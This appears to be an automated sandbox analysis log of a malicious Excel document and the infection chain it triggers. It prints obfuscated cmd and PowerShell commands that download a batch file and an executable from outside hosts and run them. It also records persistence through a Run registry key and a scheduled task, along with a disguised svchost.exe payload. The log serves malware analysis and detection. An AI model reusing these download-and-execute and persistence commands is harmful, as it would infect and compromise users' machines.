Source: C:\Windows\System32\cmd.exe	Console Write: ................p........................................................^>.....r.e.g............DB.....................T.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p........................................................Y>........J.............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............). ......................................Y>........J.............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p................................DB.....................*Y>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............$.....2..................J....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............".6...1.". .=.=. .".6...3.". ............Y>.....i.f. ............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............(................DB.............................................d1......h..v......$........................J....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............e.c.h.o.........}..v............................p.......6.......................8.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p............... .".W.i.n.d.o.w.s. .8...1. .d.e.t.e.c.t.e.d.". . .c.h.o..........DB...............$.....2.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... ..... ..........DB......................X>......................DB.............8.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............r.e.g...........}..v............................h.......I.........................$............. ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h........................................................X>.....r.e.g............DB.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............1.>......................................_>......................DB.............x.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............n.u.l. .................................._>......................DB.............x.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... ..... .........d1......................ZX>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............t.i.m.e.o.u.t...}..v....................................p.......................x.$............. ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... ./.t. .2. . ............................_>.....t.i.m.e..........DB.............H.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............1.>......................................_>..... ./.t. ..........DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............n.u.l. .................................._>..... ./.t. ..........DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... ..... .........d1......................._>......................DB.............x.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............s.c.h.t.a.s.k.s.}..v............................h.................................$............. ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h.......................................................J_>.....s.c.h.t..........DB.....................v.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............1.>.....................................:_>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............n.u.l. .................................:_>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... ..... .........d1......................._>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............t.i.m.e.o.u.t...}..v..............................................................$............. ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... ./.t. .3. . ............................^>.....t.i.m.e..........DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............1.>......................................^>..... ./.t. ..........DB.............X.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............n.u.l. ..................................^>..... ./.t. ..........DB.............X.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... ..... .........d1......................:_>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............r.e.g...........d1......................:_>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h........................................................^>.....r.e.g............DB.....................T.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h........................................................Y>........J.............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............). ......................................Y>........J.............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h................................DB.....................*Y>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............i.f. ...........`{.J....................*Y>.....X%.J.............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............".6...1.". .=.=. .".6...2.". ............Y>.....i.f. ............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............(................DB.............................................d1......h..v......$........................J....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h........................................................Y>.....(................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............e.c.h.o.........}..v............................h...............................8.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... .".W.i.n.d.o.w.s. .8. .d.e.t.e.c.t.e.d.". . ...e.c.h.o..........DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... ..... ..........DB......................X>......................DB.............8.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............r.e.g...........}..v............................h.................................$............. ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............t.i.m.e.o.u.t...}..v....................................N.......................x.$............. ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............s.c.h.t.a.s.k.s.}..v............................h.......t.........................$............. ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................1.>.....................................:_>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................n.u.l. .................................:_>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ ..... .........d1......................._>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................t.i.m.e.o.u.t...}..v..............................................................$............. ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ ./.t. .3. . ............................^>.....t.i.m.e..........DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................1.>......................................^>..... ./.t. ..........DB.............X.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................n.u.l. ..................................^>..... ./.t. ..........DB.............X.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ ..... .........d1......................:_>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................r.e.g...........d1......................:_>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: .........................................................................^>.....r.e.g............DB.....................T.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: .........................................................................Y>........J.............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................). ......................................Y>........J.............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: .................................................DB.....................*Y>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................................`{.J....................J^>......$.J..............B...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............$.....2..................J....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................i.f. ...........`{.J....................*Y>.....X%.J.............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................".6...1.". .=.=. .".6...1.". ............Y>.....i.f. ............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................(................DB.............................................d1......h..v......$........................J....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................C.m.d...........................................(................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: .........................................................................X>.....C.m.d............DB.....................t.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................). ..............DB......................Y>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ...................J............T.h.e. .b.a.t.c.h. .f.i.l.e. .c.a.n.n.o.t. .b.e. .f.o.u.n.d.......$.....`.$.....8.$.....B.......................	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................0.......................(.P.....................$.......R.................................................................2.....	Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Console Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y...........%.....N....... .%.......%.....
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ....................t...........E.R.R.O.R.:. ...................8...............................................................................
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ....................t...........E.R.R.O.(.P.....................8.......................................................j.......x...............

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Source: unknown	Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
Source: unknown	Process created: C:\Windows\System32\mode.com mode 18,1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
Source: unknown	Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\ps.exe 'C:\Users\user\AppData\Local\Temp\ps.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\ps.exe C:\Users\user\AppData\Local\Temp\ps.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
Source: unknown	Process created: C:\Windows\SysWOW64\reg.exe reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\svchost.exe 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmp121B.tmp'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\svchost.exe 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 18,1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\ps.exe 'C:\Users\user\AppData\Local\Temp\ps.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process created: C:\Users\user\AppData\Local\Temp\ps.exe C:\Users\user\AppData\Local\Temp\ps.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe 'C:\Users\user\AppData\Roaming\svchost.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmp121B.tmp'
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\ps.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Data Obfuscation:

.NET source code contains potential unpacker

Source: ps.exe.23.dr, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: GvthaHtVzpRh.exe.24.dr, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 24.2.ps.exe.e70000.2.unpack, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 24.0.ps.exe.e70000.0.unpack, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: svchost.exe.27.dr, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 27.2.ps.exe.e70000.1.unpack, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 27.0.ps.exe.e70000.0.unpack, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 32.2.svchost.exe.230000.0.unpack, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 32.0.svchost.exe.230000.0.unpack, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 35.2.svchost.exe.230000.0.unpack, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 35.0.svchost.exe.230000.0.unpack, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Obfuscated command line found

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
